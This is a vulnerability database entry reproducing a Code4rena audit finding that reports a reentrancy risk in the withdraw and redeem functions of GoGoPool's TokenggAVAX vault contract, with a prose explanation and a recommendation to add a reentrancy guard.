Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
code423n4Code4renaCODE423N4:2022-12-GOGOPOOL-FINDINGS-ISSUES-756
HistoryJan 03, 2023 - 12:00 a.m.

EXTERNAL CALL TO UNTRUSTED PARTIES

2023-01-0300:00:00
Code4rena
github.com
7
external call
untrusted parties
reentrancy vulnerability
manual tools
reentrancy guard
JSON

Lines of code
<https://github.com/code-423n4/2022-12-gogopool/blob/aec9928d8bdce8a5a4efe45f54c39d4fc7313731/contracts/contract/tokens/TokenggAVAX.sol#L202&gt;

Vulnerability details

Impact

Functions in this contract or inherited functions can be reentered.

Proof of Concept

In Vault.sol the withdrawAVAX() and redeemAVAX() functions make an external call to the msg.sender by way of _safeTransferETH. This allows the caller to reenter this and other functions in this and other protocol files. Other instances of this vulnerability exist throughout the code. However, in this particular case, msg.sender isn’t a network contract or guardian but a user. This makes it susceptible to malicious reentrancy

Tools Used

Manual

Recommended Mitigation Steps

Add a reentrancy guard

The text was updated successfully, but these errors were encountered:

All reactions

JSON